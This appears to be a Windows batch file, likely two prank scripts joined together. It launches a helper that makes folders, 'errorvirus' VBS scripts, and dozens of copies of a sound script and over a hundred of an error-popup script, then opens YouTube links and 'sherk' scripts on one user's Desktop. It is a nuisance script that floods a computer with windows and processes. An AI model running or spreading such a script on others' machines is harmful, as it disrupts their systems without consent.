@echo off
start C:\Users\jake.davis\Desktop\Makefolders.bat
start C:\Users\jake.davis\Desktop\errorvirus.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start C:\Users\jake.davis\Desktop\sound.vbs
start https://www.youtube.com/watch?v=R6NMvMLYjlc
start https://i.ebayimg.com/images/g/naEAAMXQAMlRYTJE/s-l300.jpg
@echo off
echo waiting 3 seconds to fully start 
timeout 3 >nul
goto start1

:start1
start C:\Users\jake.davis\Desktop\errorvirus.vbs
goto start2

:start2
start C:\Users\jake.davis\Desktop\Makefolders.bat
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
timeout 2 >nul 
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
start C:\Users\jake.davis\Desktop\errorvirusv2.vbs
timeout 2 >nul
echo starting sherk.exe
timeout 2 .nul
start https://www.youtube.com/watch?v=nX5hbgFBvww
start C:\Users\jake.davis\Desktop\sherkstart.vbs
start C:\Users\jake.davis\Desktop\sherkstartv2.vbs
start https://www.youtube.com/watch?v=Z7ATOBjP2Xg
start C:\Users\jake.davis\Desktop\fullyet.vbs
